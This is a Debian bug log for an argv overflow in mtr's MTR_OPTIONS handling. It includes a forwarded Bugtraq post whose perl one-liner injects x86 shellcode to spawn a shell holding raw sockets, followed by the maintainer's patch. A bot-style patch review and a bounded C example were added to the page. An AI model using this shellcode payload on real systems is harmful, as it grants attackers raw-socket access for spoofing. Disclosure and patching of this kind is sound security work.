Debian Bug report logs - #137102
mtr: array overflow in parse_mtr_options


Package: mtr; Maintainer for mtr is Robert Woodcock <rcw@debian.org>; Source for mtr is src:mtr.

Reported by: Colin Phipps <cph@cph.demon.co.uk>

Date: Wed, 6 Mar 2002 17:03:04 UTC

Severity: grave

Tags: security

Found in version 0.45-1

Fixed in version mtr/0.41-6

Done: Robert Woodcock <rcw@debian.org>

Bug is archived. No further changes may be made.



Report forwarded to debian-bugs-dist@lists.debian.org, Robert Woodcock <rcw@debian.org>, mtr@packages.qa.debian.org:
Bug#137102; Package mtr.

Acknowledgement sent to Colin Phipps <cph@cph.demon.co.uk>:
New Bug report received and forwarded. Copy sent to Robert Woodcock <rcw@debian.org>, mtr@packages.qa.debian.org.

Message #5 received at submit@bugs.debian.org:

From: Colin Phipps <cph@cph.demon.co.uk>
To: Debian Bug Tracking System <submit@bugs.debian.org>
Subject: mtr: array overflow in parse_mtr_options
Date: Wed, 6 Mar 2002 16:58:57 +0000
Package: mtr
Version: 0.45-1
Severity: grave
Justification: user security hole
File: /usr/bin/mtr
Tags: security

Debian is vulnerable to this.

debian/mtr-0.45% MTR_OPTIONS=`perl -e 'print "A "x150'` mtr
zsh: segmentation fault  MTR_OPTIONS=`perl -e 'print "A "x150'` mtr

-----Forwarded Message-----
> From: Przemyslaw Frasunek <venglin@freebsd.lublin.pl>
> To: bugtraq@securityfocus.com
> Subject: mtr 0.45, 0.46
> Date: 06 Mar 2002 15:41:43 +0100
> 
> A few days ago, a new version of mtr was released. The authors wrote
> in the CHANGELOG that they fixed a non-exploitable buffer overflow.
> In fact, this vulnerability is very easily exploitable and allows an
> attacker to gain access to a raw socket, which makes IP spoofing
> and other malicious network activity possible.
> 
> The sample exploit is TRIVIAL because of strtok/while loop in
> vulnerable code.
> 
> clitoris:/home/venglin/mtr-0.45> uname -smr
> Linux 2.4.8-26mdk i686
> clitoris:/home/venglin/mtr-0.45> setenv MTR_OPTIONS `perl -e 'print "A "x130 . "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"'`
> clitoris:/home/venglin/mtr-0.45> ./mtr
> sh-2.05$
> 
> At this point, exec'd shell has a raw socket opened:
> 
> clitoris:/home/venglin/mtr-0.45> /usr/sbin/lsof | grep raw
> sh        17263 venglin    3u   raw                        605400
> 00000000:00FF->00000000:0000 st=07
> sh        17263 venglin    4u   raw                        605401
> 00000000:0001->00000000:0000 st=07
> sh-2.05$ ls -la /proc/self/fd/
> total 0
> dr-x------    2 venglin  venglin         0 Mar  6 15:40 .
> dr-xr-xr-x    3 venglin  venglin         0 Mar  6 15:40 ..
> lrwx------    1 venglin  venglin        64 Mar  6 15:40 0 -> /dev/pts/6
> lrwx------    1 venglin  venglin        64 Mar  6 15:40 1 -> /dev/pts/6
> lrwx------    1 venglin  venglin        64 Mar  6 15:40 2 -> /dev/pts/6
> lrwx------    1 venglin  venglin        64 Mar  6 15:40 3 -> socket:[605400]
> lrwx------    1 venglin  venglin        64 Mar  6 15:40 4 -> socket:[605401]
> lr-x------    1 venglin  venglin        64 Mar  6 15:40 5 -> /proc/17318/fd
> 
> -- 
> * Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NIC-HDL: PMF9-RIPE *
> * Inet: przemyslaw@frasunek.com ** PGP: D48684904685DF43EA93AFA13BE170BF *

-- System Information
Debian Release: 3.0
Architecture: i386
Kernel: Linux nausea.netcraft.com 2.4.18 #1 Tue Feb 26 10:31:34 GMT 2002 i686
Locale: LANG=en_GB, LC_CTYPE=en_GB

Versions of packages mtr depends on:
ii  libc6                    2.2.5-3         GNU C Library: Shared libraries an
ii  libglib1.2               1.2.10-4        The GLib library of C routines
ii  libgtk1.2                1.2.10-9        The GIMP Toolkit set of widgets fo
ii  libncurses5              5.2.20020112a-3 Shared libraries for terminal hand
ii  xlibs                    4.1.0-14        X Window System client libraries



Information forwarded to debian-bugs-dist@lists.debian.org, mtr@packages.qa.debian.org:
Bug#137102; Package mtr.

Acknowledgement sent to Robert Woodcock <rcw@debian.org>:
Extra info received and forwarded to list. Copy sent to mtr@packages.qa.debian.org.

Message #10 received at 137102@bugs.debian.org:

From: Robert Woodcock <rcw@debian.org>
To: Colin Phipps <cph@cph.demon.co.uk>, 137102@bugs.debian.org
Subject: Re: Bug#137102: mtr: array overflow in parse_mtr_options
Date: Wed, 6 Mar 2002 09:44:58 -0800
On Wed, Mar 06, 2002 at 04:58:57PM +0000, Colin Phipps wrote:
> Debian is vulnerable to this.
> 
> debian/mtr-0.45% MTR_OPTIONS=`perl -e 'print "A "x150'` mtr
> zsh: segmentation fault  MTR_OPTIONS=`perl -e 'print "A "x150'` mtr

Crap. I wish the folks at Bitwizard had let me know.

Packages are building for stable now.

Here's the relevant patch which applies cleanly to 0.41:

--- mtr-0.46/mtr.c      Sun Feb 10 00:04:36 2002
+++ mtr-0.47/mtr.c      Tue Feb 19 17:52:00 2002
@@ -144,14 +144,17 @@
   argv[0] = "mtr";
   argc = 1;
   p = strtok (string, " \t");
-  while (p) {
+  while (p && (argc < (sizeof(argv)/sizeof(argv[0])))) {
     argv[argc++] = p;
     p = strtok (NULL, " \t");
   }
+  if (p) {
+    fprintf (stderr, "Warning: extra arguments ignored: %s", p);
+  }
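Review bot: the new bound `argc < (sizeof(argv)/sizeof(argv[0]))` lets argc reach the array's full element count, so no slot is left for a terminating NULL; if this argv is later handed to a getopt-style parser or anything else that expects `argv[argc] == NULL`, the limit should be one less than the element count. The check also only works because argv is a fixed-size array in this scope (on a pointer it would measure the pointer), which is worth a comment next to the condition. Minor: the warning in the trailing `if (p)` block has no newline after `%s` and reports only the first dropped token, since p is just the next strtok result, not the rest of the string.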
-- 
Robert Woodcock - rcw@debian.org
"The nuclear bomb. Does that bother you? I just want you to think big."
	-- Nixon to Kissinger, April 25, 1972
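As an added example (written for this page, not mtr's code and not the patch above): a bounded version of the MTR_OPTIONS tokenizer that the hunk fixes, modelled on its fixed argv array and strtok loop, but keeping one slot for a NULL terminator and counting every dropped token rather than printing only the first. It is run against the reporter's 150-token "A " input. The 32-slot array, the function names and the sample option string are assumptions for illustration.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/*
 * Bounded re-implementation of the MTR_OPTIONS tokenizer (added example,
 * not mtr's code). Fills argv[] from `string` with strtok, as the original
 * does, but never writes past `slots` entries and reserves the last slot
 * for a NULL terminator, which getopt-style parsers expect.
 *
 * Returns argc, or -1 if the array is too small to hold even "mtr" + NULL.
 * *dropped receives the number of tokens that did not fit. `string` is
 * modified in place by strtok, as in the original.
 */
static int parse_options_bounded(char *string, char *argv[], size_t slots,
                                 size_t *dropped)
{
    size_t argc = 0;
    char *p;

    *dropped = 0;
    if (slots < 2)
        return -1;

    argv[argc++] = "mtr";
    p = strtok(string, " \t");
    /* slots - 1: keep the final slot free for the terminator */
    while (p && argc < slots - 1) {
        argv[argc++] = p;
        p = strtok(NULL, " \t");
    }
    argv[argc] = NULL;

    /* Consume (and count) what the unbounded loop would have written
     * past the end of the array. */
    while (p) {
        (*dropped)++;
        p = strtok(NULL, " \t");
    }
    if (*dropped)
        fprintf(stderr, "Warning: %zu extra argument(s) ignored\n", *dropped);
    return (int)argc;
}

/* Build the reporter's input: `tok` repeated n times (constructed data). */
static char *repeat_token(const char *tok, size_t n)
{
    size_t len = strlen(tok);
    char *s = malloc(len * n + 1);
    if (!s)
        return NULL;
    for (size_t i = 0; i < n; i++)
        memcpy(s + i * len, tok, len);
    s[len * n] = '\0';
    return s;
}

/* The reporter's 150-token case against an assumed 32-slot argv.
 * Returns argc; *dropped receives the count of ignored tokens. */
static int demo_argc(size_t *dropped)
{
    char *argv[32];
    char *input = repeat_token("A ", 150);
    int argc = -1;

    if (input) {
        argc = parse_options_bounded(input, argv,
                                     sizeof argv / sizeof argv[0], dropped);
        free(input);   /* argv[] now dangles; it is not used again */
    }
    return argc;
}

int main(void)
{
    size_t dropped = 0;
    int argc = demo_argc(&dropped);

    /* 1 ("mtr") + 30 stored tokens = 31; 150 - 30 = 120 dropped */
    printf("argc=%d dropped=%zu\n", argc, dropped);
    return argc < 0;
}
```

With the original `while (p)` loop the same input writes 150 pointers into an array of fixed size, which is the overflow Colin reproduced with the segfault above; with the bound in place the excess is counted and ignored and `argv[argc]` stays NULL.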



Reply sent to Robert Woodcock <rcw@debian.org>:
You have taken responsibility.

Notification sent to Colin Phipps <cph@cph.demon.co.uk>:
Bug acknowledged by developer.

Message #15 received at 137102-close@bugs.debian.org:

From: Robert Woodcock <rcw@debian.org>
To: 137102-close@bugs.debian.org
Subject: Bug#137102: fixed in mtr 0.41-6
Date: Wed, 06 Mar 2002 13:02:13 -0500
We believe that the bug you reported is fixed in the latest version of
mtr, which is due to be installed in the Debian FTP archive:

mtr_0.41-6.diff.gz
  to pool/main/m/mtr/mtr_0.41-6.diff.gz
mtr_0.41-6.dsc
  to pool/main/m/mtr/mtr_0.41-6.dsc
mtr_0.41-6_i386.deb
  to pool/main/m/mtr/mtr_0.41-6_i386.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 137102@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Robert Woodcock <rcw@debian.org> (supplier of updated mtr package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Format: 1.6
Date: Wed,  6 Mar 2002 09:50:29 -0800
Source: mtr
Binary: mtr
Architecture: source i386
Version: 0.41-6
Distribution: stable
Urgency: high
Maintainer: Robert Woodcock <rcw@debian.org>
Description: 
 mtr        - Full screen ncurses or X11 traceroute tool
Closes: 137102
Changes: 
 mtr (0.41-6) stable; urgency=high
 .
   * Security fix for format overflow with MTR_OPTIONS, closes: #137102
   * Added build-depends line from unstable package
Files: 
 f72f30e0c8e34b19affe5219bb901395 626 net optional mtr_0.41-6.dsc
 4c7d03ec09a6d34e42464ba1ec2b0b7e 15772 net optional mtr_0.41-6.diff.gz
 4ba7815729e243669e8d825f5b8373a2 37908 net optional mtr_0.41-6_i386.deb

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org

iD8DBQE8hlZB9c5o62/wq/IRAgmtAJ9iUQSq1j7mFGfO4M9HOfwC+AMUwgCfeHc2
ZvcCNWng7XPmc95Pr9qLJ2w=
=Jv6N
-----END PGP SIGNATURE-----




Message #16 received at 137102-close@bugs.debian.org:

From: Robert Woodcock <rcw@debian.org>
To: 137102-close@bugs.debian.org
Subject: Bug#137102: fixed in mtr 0.41-6
Date: Mon, 01 Apr 2002 18:37:43 -0500
We believe that the bug you reported is fixed in the latest version of
mtr, which is due to be installed in the Debian FTP archive:

mtr_0.41-6.diff.gz
  to pool/main/m/mtr/mtr_0.41-6.diff.gz
mtr_0.41-6.dsc
  to pool/main/m/mtr/mtr_0.41-6.dsc
mtr_0.41-6_i386.deb
  to pool/main/m/mtr/mtr_0.41-6_i386.deb


    Note that this package is not part of the released stable Debian
    distribution.  It may have dependencies on other unreleased software,
    or other instabilities.  Please take care if you wish to install it.
    The update will eventually make its way into the next released Debian
    distribution.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 137102@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Robert Woodcock <rcw@debian.org> (supplier of updated mtr package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Format: 1.6
Date: Wed,  6 Mar 2002 09:50:29 -0800
Source: mtr
Binary: mtr
Architecture: source i386
Version: 0.41-6
Distribution: stable
Urgency: high
Maintainer: Robert Woodcock <rcw@debian.org>
Description: 
 mtr        - Full screen ncurses or X11 traceroute tool
Closes: 137102
Changes: 
 mtr (0.41-6) stable; urgency=high
 .
   * Security fix for format overflow with MTR_OPTIONS, closes: #137102
   * Added build-depends line from unstable package
Files: 
 f72f30e0c8e34b19affe5219bb901395 626 net optional mtr_0.41-6.dsc
 4c7d03ec09a6d34e42464ba1ec2b0b7e 15772 net optional mtr_0.41-6.diff.gz
 4ba7815729e243669e8d825f5b8373a2 37908 net optional mtr_0.41-6_i386.deb

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org

iD8DBQE8hlZB9c5o62/wq/IRAgmtAJ9iUQSq1j7mFGfO4M9HOfwC+AMUwgCfeHc2
ZvcCNWng7XPmc95Pr9qLJ2w=
=Jv6N
-----END PGP SIGNATURE-----






Debian bug tracking system administrator <owner@bugs.debian.org>. Last modified: Sat Apr 19 18:40:40 2014; Machine Name: beach.debian.org

Debian Bug tracking system
Copyright (C) 1999 Darren O. Benham, 1997,2003 nCipher Corporation Ltd, 1994-97 Ian Jackson.